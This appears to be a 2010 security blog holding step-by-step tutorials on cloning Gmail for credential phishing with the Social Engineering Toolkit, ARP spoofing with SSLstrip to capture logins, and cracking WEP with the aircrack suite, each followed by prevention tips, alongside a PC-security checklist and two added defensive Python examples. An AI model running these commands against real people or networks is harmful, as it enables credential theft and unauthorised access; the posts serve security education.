Monday, September 6, 2010

Social Engineering, Phishing Tutorial and Prevention Tips - Part 1

I am excited to be writing another blog post. It has been a while since my previous writing. Over the next month or so, I will be presenting you all with a series of social engineering attacks from a technical standpoint. In most cases, social engineering deals with manipulating a human being - an employee or an individual - to disclose personal information - username/password; social security number; credit card number; etc. - through a well-thought-out scheme.

From the technical standpoint, I will be demonstrating the different types of phishing attacks throughout the upcoming series of posts. Phishing is defined as a "criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication." The electronic communication mostly comes in the form of e-mail or instant messaging. Phishing attacks are becoming more prevalent with time, and the amount of money lost every year by individuals and organizations is rising.

Phishing attacks have been increasing over the last years. According to a study conducted by the Gartner consulting firm, more than 5 million people in the United States lost money due to phishing attacks as of September 2008, which represents an increase of 39.8% over the previous year. Additionally, the average amount of money lost due to phishing attacks in 2008 was $351, an increase from $256 in 2005. McAfee reported in the white paper, Phishing and Pharming: Understanding Phishing and Pharming, that $1.2 Billion was lost in 2003 due to phishing attacks. In 2007, Gartner reported, $3.2 Billion was lost due to phishing attacks.

These figures alone demonstrate that the general public is not aware of the types of phishing attacks or is not taking them seriously. Another reason for my desire to write this series of posts came after reading numerous articles from individuals who fell victim to these attacks because they did not understand how it happened. Furthermore, I recently came across a McAfee-sponsored website named Stop H*Commerce. The website is very informative on how to protect yourself online from phishing attacks and identity theft. There is also a six-episode series showing real-life stories of people whose lives were destroyed by these heartless thieves. Lastly, a security vendor - Panda Security - released the top 10 Internet scams of the last decade, and all ten Internet scams are some form of phishing attack or social engineering.

Now, onto the demonstration. For the first part of the series, I will be presenting a phishing attack to steal login credentials. For simplicity, I will be stealing email credentials, but this process could be used for anything related to credit card information, such as PayPal, online banking credentials, eBay, etc. In short, I will be sending an email containing a link to a spoofed website. In this case, it will be a counterfeit Gmail website. Once the victim clicks the link and enters their login information, that information will automatically be sent back to me and the victim will be redirected from the fraud site to the official Gmail website.
Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Social Engineering Toolkit. These tools are included with Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.
2. I will be conducting this demonstration solely with VMware. The virtual computers will consist of a Windows XP computer and a BackTrack 4 Linux distro.

Steps:


1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.

2. Open up a Konsole window. It is the 3rd icon from the bottom right.

3. Type /etc/init.d/networking start and press enter. This will get our IP address that we will need later in this tutorial.

4. Type clear and press enter to clear the screen.

5. Type cd /pentest/exploits/SET and press enter to reach the Social Engineering Toolkit (SET) directory.


6. Type nano config/set_config to change the configuration of the SET.


 
7. Use the down arrow key until you reach the setting for "WEBATTACK_EMAIL" and make sure it is equal to "ON" instead of "OFF."
 
 
8. Hit ctrl + x to exit out of the configuration setting.


9. Now, let us start the SET.

10. Type ./set




11. Select number "2" for Website Attack Vector


12. Select number "3" for Credential Harvester Attack Method


13. Select number "2" for the Site Cloner


14. Now we must decide the site we want to clone. Typically, the attacker will want to clone a website with login authentication. As mentioned earlier, I will clone the site of Gmail. Type https://gmail.com and press enter.


15. We successfully cloned the website!!

16. Press enter again.

 
17. Type "1" since we are going to be attacking a single e-mail address. At this step, you may also attack as many e-mail addresses as you want by having the e-mail addresses typed in a text file with each one on their own line.
 
 
18. Type the e-mail address you want to lure in the phishing attack. As you see in the screenshot below, I typed LILRALPH713@GMAIL.COM.
 
 
19. At this step, we enter a source e-mail or we may spoof our e-mail address through the second option with the use of Sendmail. For simplicity of explanation and ease of intrusion, I will type a source e-mail. I will use SHBELAY@GMAIL.COM
 
 
20. Since we are using a specific source e-mail, we have to type in our password.


21. Now, for the deceitful e-mail we start with the subject. For this tutorial, I type GMAIL AUTHENTICATION NEEDED IMMEDIATELY!


22. Onto the body of the email, I type CLICK ON THE LINK TO GO TO GMAIL AND CHANGE YOUR PASSWORD! HTTP://192.168.75.128 and press enter.
  • The web address I give them is my BackTrack 4 computer's IP address. You can find this out by opening a new shell and typing ifconfig
  • An attacker would add HTML coding to this message to hide the true URL address.  In essence, the victim would see gmail.com but behind the HTML the URL would be a very similar address or an IP address.

23. Hit ctrl + c to exit the message editing.


24. When you press enter, SET will now be listening on port 80 with your IP address.


25. Now, I go to my Windows XP computer and login into LILRALPH@GMAIL.COM to view the message.

Notice the web address! Users do not usually pay attention to this small detail because they believe what they see and the link that was clicked.
Entering my login information
Look at the address again.  It has changed to the legit Gmail address.  Within the login authentication check, the victim information was sent to the attacker at a remote location.


Prevention Tips:

The following are policies and procedures that are typically instated in organizations and educational institutions. I will reiterate most of the policies and add what I feel is important.
  • Go to Stop H*Commerce and read the "Resource Center" - located at the top menu bar - and educate yourself on phishing techniques and tips on protection.
  • Read my previous post, Security Essential for a New Personal Computer.
  • Read the Federal Trade Commission's article, How Not to Get Hooked by a "Phishing Scam."
  • The Internet Crime Complaint Center (IC3) has some great tips for various cyber crimes @ Internet Crime Prevention Tips.
  • Never reply to an e-mail with your username, password, ID, or any other personal information. I cannot imagine an organization asking for this type of information. If it seems real, call the company or the help desk number that is posted on the official website - not the e-mail.
  • Never click on a link that directs you to a website where you must login to access information. Open a new tab or window and type the address manually.
What to do if you suspect that you were a victim of phishing scam:
  1. Change all the passwords that were exposed.
  2. Contact the institution that was being impersonated and inform them of the situation.
  3. If your social security number, credit card numbers, driver license information, etc. were exposed, contact the following three major credit bureaus: Equifax, Experian, TransUnion.
  4. If possible, forward the e-mail to the institution that was being impersonated and to the FTC @ spam@uce.gov
  5. Submit your complaint @ FTC Complaint Assistant. Here is the direct link.
  6. File a complaint with IC3 @ http://www.ic3.gov/complaint/default.aspx
Sources:
  1. Social Engineering (security)
  2. Phishing and Pharming - Understanding phishing and pharming by McAfee
  3. Gartner Survey Shows Phishing Attacks Escalated in 2001; More than $3 Billion Lost to These Attacks
  4. Nigerian scam tops list of decade's online cons
Other interesting reads:
  1. Snoop Dogg Raps About Cyber Crime (Snoop Dogg fell victim to a phishing technique)
  2. Nothing New in Aurora Hack (A Google employee fell for a phishing technique and clicked on a malicious link; as a result, Google's network was penetrated)

Thursday, July 29, 2010

Insecurities of Today's Websites and How to Abate the Risk

Online activities by individuals are growing on a daily basis, from social networking and communications by e-mail to shopping, money transferring through third parties, etc.  End-users expect these activities or transactions to be secure through username/password and SSL encryption.  Unfortunately, this is not the case with most popular websites.  I will be demonstrating the insecurities of common websites by intercepting username/password in clear text, and at the end of the presentation I will present a solution to prevent you from being a victim of this type of attack.

Presently, there is a false assumption of online security.  For example, when a user visits facebook.com, the address will display http://www.facebook.com.  The user enters their username/password and clicks "login."  The action of clicking "login" takes users to the encrypted site of facebook.com.  The user can verify this by viewing the address change to https://www.facebook.com.  The added "s" at the end of http stands for "secure" by using SSL/TLS protocol to provide encryption and secure identification.

The issue with this type of design is the initial unencrypted page when the user enters their information.  An attacker can intercept this session before the information is encrypted and sent for verification to Facebook server; afterward, the attacker sends the information to Facebook server for the user to receive the information they have requested.  The user will never know the attack is happening.  The attack is called Man-in-the-Middle (MITM).  In short, the attacker is in between the user's computer and the website's server viewing/recording all communication.


Now, for the demonstration.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools.  We will be using Ettercap and SSLStrip.  These tools are included with Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.
2. A wireless adapter that allows passive packet sniffing and packet injection.  I am using Alfa AWUS036H Wireless Adapter.  The USB connection, good antenna, and ease of use make the adapter a good choice.

3. A test network lab with two computers - the attacker and the victim - and a router or wireless access point.  I will be using a wireless access point to demonstrate the ease of the attack and the needed security awareness and precautions when accessing open Wi-Fi areas.

Steps:

1.    Boot up Backtrack.  The login is "root" and the password is "toor."  Do not include quotes or the period at the end of toor.  Type "startx" at the next prompt.

2.    Open up a Konsole window.  It is the 3rd icon from the bottom right.

3.    Type /etc/init.d/wicd start

4.    Click the KDE menu / go to Internet / click Wicd Network Manager and connect to the particular network.  Close the window and go back to the Konsole window.

5.    Type clear and hit enter

6.    Type kate /etc/etter.conf


7.    This command will open the file etter.conf in a notepad-type program called Kate.

8.    Scroll down to the "Linux" section and delete the two pound signs under "if you use iptables:."  



9.    Once you have completed the step, save the file and close the window.  The pound signs were used for comments.  In programming, comments are put in for the programmer and not for the program.  Consequently, these two lines of code would not have run when needed later in the demonstration.

10.    Go back to the Konsole window and type echo 1 > /proc/sys/net/ipv4/ip_forward


11.    The command enables IP (Internet Protocol) forwarding on our computer.  This allows our Backtrack computer to act as a router: it receives communication from our target/victim and passes it on.  In short, once our victim's computer sends all its traffic to our computer instead of the wireless router access point, that traffic still reaches its destination.

12.    Type clear to clear our window.

13.    Type arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
  • This allows us to send unsolicited ARP responses and let us become any IP address on a local network.
  • -i stands for interface that we are using; which is wlan0.
  • -t stands for target.  Following the option is the target/victim's IP address, which is 192.168.1.100
  • Following the victim's IP address is the actual wireless router (gateway) IP address that we are becoming and fooling the victim's computer into sending us their traffic.
  • When we hit enter, we start letting the victim know that the gateway IP is our MAC address.  Now, our target is going to be sending their traffic to us instead of the real gateway.
14.    To discover your interface on Backtrack, open a Konsole window and type ifconfig.  Whatever interface has an IP address is the interface that you are utilizing.


15.    My target computer is a Windows machine.  To know the IP address, go to Start and type cmd in the run/search box.  Type ipconfig to know your Ethernet adapter IP address.


16.    You will see the target IP address; as well as, the gateway IP address.

17.    When you type the arpspoof command and hit enter, you should see the following screenshots.


18.    Now, open a new Konsole window or new shell (by going to session/shell) and type iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  • This command reroutes communication destined for port 80 to port 10000 on our computer.  We are going to be setting up SSLstrip to be listening on port 10000 on our system.

19.    Hit enter and type clear and hit enter to clear screen.

20.    Type, sslstrip -a -k -f
  • -a means to log all SSL and HTTP traffic to and from server
  • -k means kill sessions in progress.  For example, if they were logged into Gmail, Facebook, Paypal, etc., this command would log them out of the site; therefore, they could log back in with their credentials.
  • -f means to put a fake lock on the browser to make it seem the connection is secure.

21.    Hit enter, this will create a sslstrip.log file on your desktop.  This file will log all the traffic from your victim.


22.    Now, open a new Konsole window or shell (by going to session/shell).

23.    Type ettercap -T -q -i wlan0
  • -T means to display text
  • -q means to be quiet and do not display packet contents.  
  • -i means interface that we are using.
  • On the actual Konsole window we are using, the username/passwords will display when the user logs into a website.  This happens instantaneously.  For further details in their Internet usage, you can view the sslstrip.log file on your desktop.

24.    Hit enter and the following screenshot will display


25.    When your target visits a website requiring a username/password, it will automatically be posted onto your screen in clear text.  This is due to the SSL encrypted session being stripped and a phony lock being posted on the browser to make it seem the session is still secure.  The following screenshots display examples of an SSL session being stripped.  The first one is a secure session: there is an "s" at the end of "http" and there is a legit certificate at the right hand side of the address bar.  The second one is an SSL session being stripped: there is no "s" at the end of "http" and there is a phony lock at the left hand side of the address bar.  Internet Explorer does not display the lock at the left hand side.  Mozilla Firefox displays a green bar or a blue bar, depending on the security level, at the left hand side of the address bar.


26.    Now, for the intercepting of the target's traffic.  I posted multiple screenshots of different websites that require a username/password.  The last screen shot will display the username/password in clear text.

Username: shbelay / Password: password
Username: shbelay@gmail.com / Password: password
Username: shbelay / Password: password


As you can see, the username/password is in red and the website information I intercepted is in green.  I was able to do this with multiple websites, including Paypal, Hotmail, and Amazon.  Furthermore, the "sslstrip.log" file will log your entire browsing session.  This could capture personally identifiable information and credit card numbers.

How to Protect Yourself

Protecting yourself online from these types of attacks is as simple as typing "https://" before the website address to ensure that you are on a secure website.  The issue presently is that websites put their username/password boxes on an unsecured page.  For example, when you enter the following addresses: amazon.com; facebook.com; ebay.com; paypal.com; etc., you will receive an "http" site.

Of course, no one wants to type "https" every time they logon to a website.  An easy substitution for this task is to install a Mozilla Firefox add-on called HTTPS Everywhere.  Unfortunately, Internet Explorer does not have this capability.  As a result, I recommend using Mozilla Firefox for this issue, unless you are willing to type "https://" every time in Internet Explorer.

I installed this add-on and was unable to strip the SSL connection.  I received the following screenshots when viewing the following websites:


The browser is informing me that it cannot verify the certificate of the website's server and to exit or enter at your own risk.  As always, I will mention that there is not a computer or network that is completely secure.  The intention is to become more secure than the next computer/network or to make it as difficult as possible to break through the security barriers.
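
The ARP spoofing in step 13 also leaves a trace on the victim's side: the gateway IP address suddenly maps to a MAC address that belongs to another machine on the network. The following is an added example, not part of the original post: it assumes a Linux host whose neighbour table is read in the /proc/net/arp format, and the MAC addresses and the 192.168.1.105 entry are constructed sample values (192.168.1.1 is the gateway used in the steps above).

```python
"""Added example: spot a poisoned gateway entry in a Linux ARP table."""
from collections import defaultdict

ATF_COM = 0x2  # flag bit set on completed (resolved) ARP entries

# Constructed sample tables in /proc/net/arp format.
CLEAN_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:01     *        wlan0
192.168.1.105    0x1         0x2         aa:bb:cc:00:00:66     *        wlan0
192.168.1.120    0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

SPOOFED_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:66     *        wlan0
192.168.1.105    0x1         0x2         aa:bb:cc:00:00:66     *        wlan0
192.168.1.120    0x1         0x0         00:00:00:00:00:00     *        wlan0
"""


def parse_proc_net_arp(text):
    """Return [(ip, mac, device)] for completed entries, skipping the header."""
    entries = []
    for line in text.strip().splitlines()[1:]:
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, device = fields
        if int(flags, 16) & ATF_COM == 0:
            continue  # unresolved entry, its all-zero MAC means nothing
        entries.append((ip, mac.lower(), device))
    return entries


def find_arp_anomalies(table_text, gateway_ip, pinned_gateway_mac=None):
    """Return a list of alert strings for the given gateway.

    pinned_gateway_mac is an optional baseline recorded while the network
    was known to be clean (for example from the router's label).
    """
    ips_by_mac = defaultdict(set)
    gateway_mac = None
    for ip, mac, _device in parse_proc_net_arp(table_text):
        ips_by_mac[mac].add(ip)
        if ip == gateway_ip:
            gateway_mac = mac

    alerts = []
    if gateway_mac is None:
        return alerts  # gateway not in the table yet, nothing to compare

    if pinned_gateway_mac and gateway_mac != pinned_gateway_mac.lower():
        alerts.append(
            f"gateway {gateway_ip} is at {gateway_mac}, expected {pinned_gateway_mac.lower()}"
        )

    # A host that answers for the gateway and for its own address shares one MAC.
    others = sorted(ips_by_mac[gateway_mac] - {gateway_ip})
    if others:
        alerts.append(
            f"gateway {gateway_ip} shares MAC {gateway_mac} with {', '.join(others)}"
        )
    return alerts


if __name__ == "__main__":
    for name, table in (("clean", CLEAN_TABLE), ("spoofed", SPOOFED_TABLE)):
        print(name, find_arp_anomalies(table, "192.168.1.1", "aa:bb:cc:00:00:01"))
```

On a real host, pass the contents of /proc/net/arp as table_text; the pinned baseline catches the case where the other machine's own address is not in the table.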

Thursday, July 8, 2010

Security Essentials for a New Personal Computer

Identity theft and malware are on a rapid rise for profit.  Black hat hacking has become a billion dollar business through anonymity and covert operations.  For individuals buying new computers, it is essential to install a few security programs.  When a computer is connected to the Internet as bought, within a short period of time (most likely within an hour) it will be cracked without warning.  Anti-virus software and spyware/malware protection software are not enough against the sophistication and ease-of-use of today's hacker tools.

Anybody can become a victim without proper precautions.  For those still skeptical, there are plenty of Trojans available for purchase on the Internet that are made specifically to steal bank account information, social security numbers, or any personally identifiable information.  Black hat hackers scan the Internet for open ports and send these Trojans through the ports or by e-mail through phishing.  Once installed and undetected, the information is automatically sent back to the perpetrator.  This happens without the person's knowledge while logging into their bank site, filling out forms for credit cards, or buying an item online.  We have to be very cautious and use good judgment while surfing the web.

The following are free software that I recommend to install immediately when a new computer is bought.

  1. Anti-virus Software is needed to protect your computer from viruses before they cause any damage.  Avast (download) is widely used and respected.  Avast has one for purchase for greater protection.
  2. Spyware/Adware/Malware protection is needed to protect your browsing information from being logged and sent back to the creator without permission and possibly for malicious intent.  I install three programs since each of them usually catches malicious software that was not caught by the others.  They are: Ad-aware, Malwarebytes, and Spybot.
  3. Firewall is extremely important to keep hackers away.  As mentioned, they look for open ports used by the individual's computer to have complete access.  Firewalls can be configured to block all incoming connections until the user permits access.  The firewall I use is Comodo Firewall.
  4. Microsoft Security Essentials is an incredible product that provides real-time protection.  I found that this product usually catches malicious software before my anti-virus software and malware protection software.  Microsoft continuously updates this product with the latest threats.
  5. Registry cleaner is needed to find any suspicious files or files that stayed in the registry after uninstalling a program.  This type of software helps the system's performance.  A good software is CCleaner.
  6. Lastly and I believe most important is a patching program.  There are hacker tools that provide information on the type of software version that is installed on the computer.  If the software is not updated, it will be extremely easy to crack into the computer through information provided by the manufacturer on the necessary update.  I installed two patching programs.  The one I regularly use is FileHippo.  In addition, I periodically use Secunia PSI.  To learn more about patching and its importance, read my blog post, Importance of Patches.

Others that would be good to have but not necessary are:

  1. Microsoft Baseline Security Analyzer is designed for IT professionals in small/medium sized business.  I have this installed for my personal computer and found it very helpful.  The program will scan Microsoft products installed on the computer and have suggestions and how-to's for making the specific Microsoft program more secure.  It is a great product.
  2. I suggest using Mozilla Firefox browser for its add-ons.  The open-source community consists of incredibly amazing individuals.  They write software programs and provide them to the public free of charge.  The add-ons I use for safer browsing are: NoScript, AdBlock, and HTTPS Everywhere.
  • NoScript blocks software languages - Java, Javascript, Flash, etc. - that are mainly used by black hat hackers as executables to install malicious software.  You have the ability to temporarily or permanently allow the scripts to load for the specific website.
  • AdBlock is, as you most likely have figured, an ad-blocking program.
  • HTTPS Everywhere provides a secure connection to sites that offer that option by encryption.  The following is a quote from the website:
"Many sites on the web offer some limited support for encryption over HTTPS, but make it difficult to use. For instance, they may default to unencrypted HTTP, or fill encrypted pages with links that go back to the unencrypted site."
For now, these are my recommended programs for computers to stay safe while browsing the Internet.  Though, as repeated in the information security community, security never stays stagnant and is a continuous process due to black hat hackers becoming more intelligent and their tools becoming more sophisticated in cracking computers and networks.

Saturday, June 5, 2010

Cracking WEP Encrypted Wireless Network and Solution to Stronger Security

This tutorial will explain the steps in cracking into a WEP (Wired Equivalent Privacy) encrypted wireless network, the reason for the vulnerabilities in WEP, and proper steps in protecting yourself from having your wireless network penetrated.

Cracking Tutorial

Needed Equipment:

1. A computer to run Backtrack 4 - This is a Linux distribution containing a collection of penetration testing tools. We will be using the Aircrack suite that is included with the Backtrack distribution.
  • This link provides detailed instructions on multiple ways to run Backtrack on your computer.

2. A wireless adapter that allows passive packet sniffing and packet injection. I am using Alfa AWUS036H Wireless Adapter. The USB connection, good antenna, and ease of use make the adapter a good choice.

3. Wireless router. I am using Cisco-Linksys WRT54GL wireless router.

Steps:

1. Boot up Backtrack. The login is "root" and the password is "toor." Do not include quotes or the period at the end of toor. Type "startx" at the next prompt.

2. Open up a Konsole window. It is the 3rd icon from the right on the lower left hand corner.
  • In the steps, I post what I actually typed as you can see on the screen shots.  Below the steps is the syntax for the command line. Replace the word in the parenthesis for your actual data. Click on the screen shots for an expanded view.

3. Type airmon-ng at the command prompt and press enter to list the adapters associated with your computer. I only have the Alfa adapter which is the wlan0 interface.
airmon-ng



4. Type airmon-ng stop wlan0 and press enter. This step takes wlan0 out of monitor mode.
airmon-ng stop (interface)



5. Type ifconfig wlan0 down and press enter. The step enables us to change our MAC address in the next step so we can access the wireless router even if it has a MAC address filter to prevent outsiders from entering.
ifconfig (interface) down



6. Type macchanger --mac 00:11:22:33:44:55 wlan0 and press enter. The MAC address is a physically embedded address for the NIC card. Every computer has a different MAC address. In order to penetrate into a wireless network with MAC filtering enabled, we would have to find out a legit MAC address that we can copy. For this tutorial, I am hacking into my own network without MAC filtering. I will be using a bogus MAC address for demonstration purposes.
macchanger --mac 00:11:22:33:44:55 (interface)



7. Type airmon-ng start wlan0 and press enter. This will put the wireless adapter in monitor mode.
airmon-ng start (interface)



8. Type airodump-ng wlan0 and press enter to display a list of wireless networks to penetrate. In the figure below, my network is listed second. Once you spot the network, hit ctrl+c together to stop the process.
airodump-ng (interface)



9. Type airodump-ng -c 6 -w Li --bssid 68:7F:74:27:99:B5 wlan0 and press enter. The -c 6 indicates channel 6; -w Li indicates that I will be saving a file named Li that will contain collected data packets. The bssid is the MAC address of the wireless router and wlan0 is the interface.
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)



10. The figure below automatically pops up. Now, you are capturing data packets and saving the data packets to the specified file named earlier. You will need around 20,000 data packets to crack the WEP key. I've read the number of packets go as high as 80,000. The number in the "#Data" column is the amount of packets captured.



11. Open a new Konsole window and type aireplay-ng -1 0 -a 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 -e LilRalph wlan0 and press enter.
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)



12. Type aireplay-ng -3 -b 68:7F:74:27:99:B5 -h 00:11:22:33:44:55 wlan0 and press enter. We are creating more router traffic to speed up the process of cracking the WEP key.
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)



13. Once you have captured enough packets, open up a new Konsole window and type aircrack-ng -b 68:7F:74:27:99:B5 Li-01.cap and press enter.  "Li-01.cap" is the file I created in step 9. I posted my screen shot of the file saved to the desktop. You can try every 5,000 packets. If it is not enough to crack the WEP key, the screen will display that it did not succeed and wait for more data packet capture. If it did succeed cracking the WEP key, it will display the figure below with key in hexadecimal format. You can type this hexadecimal number into the text box for the key without the colons and you successfully hacked into the wireless network.
aircrack-ng -b (bssid) (file name-01.cap)

 *The file, Li-01.cap, is where I will be saving the data captures


*Waiting for result.....


*....still waiting


*Failed. Hit ctrl+z to stop and the next time you try again, hit the up arrow key and press enter.


*Yay. Passed. Now, enter that security key without the colons to enter the network.

Insight

WEP uses an RC4 stream cipher encryption algorithm. The 128 bit WEP key uses 104 bits for the key plus 24 bits for the initialization vector (IV). The security issue and ease of cracking WEP are linked to the length of the IV and to it being sent in clear text with the data packets encrypted using the RC4 algorithm. The clear text IV will eventually repeat itself with different encrypted data packets. WEP's IV size of 24 bits provides for 16,777,216 (each bit is a 1 or a 0, thus 2 to the 24th power) different RC4 cipher streams for a given WEP key, for any key size. Depending on the amount of traffic (number of users on the network), the key can be cracked in a short amount of time.
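
Why a repeated IV matters, as an added example that is not part of the original post: two packets encrypted under the same IV and key share one RC4 keystream, so knowing the plaintext of one reveals the other, and a 24-bit IV repeats after only a few thousand packets when IVs are picked at random. The key, IV and packet contents are constructed sample values, the frame layout is simplified (no key ID byte or integrity check value), and the collision count uses the standard birthday approximation under the assumption of uniformly random IVs.

```python
"""Added example: keystream reuse under a repeated WEP IV."""
import math

IV_BITS = 24

# Constructed sample values: a 104-bit secret, one 24-bit IV, two 24-byte payloads.
SECRET = bytes.fromhex("0102030405060708090a0b0c0d")
IV = bytes.fromhex("a1b2c3")
P_KNOWN = b"GET /index.html HTTP/1.1"
P_SECRET = b"user=alice&pw=example123"


def rc4_keystream(key, n):
    """Generate n bytes of RC4 keystream (key scheduling, then output loop)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv, secret, plaintext):
    """Simplified WEP: the RC4 key is IV || secret and the IV travels in clear."""
    return iv + xor(plaintext, rc4_keystream(iv + secret, len(plaintext)))


def recover_with_shared_iv(frame_known, plaintext_known, frame_target):
    """Decrypt frame_target without the secret, given one known plaintext."""
    if frame_known[:3] != frame_target[:3]:
        raise ValueError("frames use different IVs, keystreams differ")
    keystream = xor(frame_known[3:], plaintext_known)
    return xor(frame_target[3:], keystream)


def frames_until_iv_collision(probability, iv_bits=IV_BITS):
    """Birthday approximation: frames needed before some IV repeats."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def demo():
    frame1 = wep_encrypt(IV, SECRET, P_KNOWN)
    frame2 = wep_encrypt(IV, SECRET, P_SECRET)
    return recover_with_shared_iv(frame1, P_KNOWN, frame2)


if __name__ == "__main__":
    print("recovered without the key:", demo())
    print("frames for a 50% chance of an IV repeat:", frames_until_iv_collision(0.5))
```

The weakness sits in the IV handling and not in the length of the secret, which is why the Solution below is a different protocol and not a longer WEP key.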

Solution

Use WPA2 Personal with TKIP+AES or PSK encryption. The only realistic way for this security to be hacked is by having a weak password that can be cracked by password cracking tools. Another way, which is feasible but unrealistic, is by brute force. Brute force means trying every password combination with all possible characters. The crack is feasible with time but unrealistic because of the length of time it will take to crack a strong password. Therefore, use a strong password (guidelines and examples) for the key to the network. I recommend using this password generator site to generate a 63 character password and storing the password in Keepass (blog post about the product).